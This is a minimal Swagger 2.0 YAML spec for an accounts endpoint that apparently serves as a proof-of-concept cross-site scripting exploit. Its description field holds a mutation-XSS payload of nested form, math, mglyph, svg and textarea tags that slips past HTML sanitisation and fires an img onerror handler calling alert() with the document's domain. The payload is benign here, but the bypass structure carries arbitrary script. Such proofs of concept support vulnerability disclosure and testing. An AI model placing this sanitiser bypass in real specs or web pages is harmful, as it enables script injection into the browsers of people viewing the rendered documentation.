swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
        <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert("XSS by @Spaghetti-ohne-Wasser at " + document.domain) src=1>"></form>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
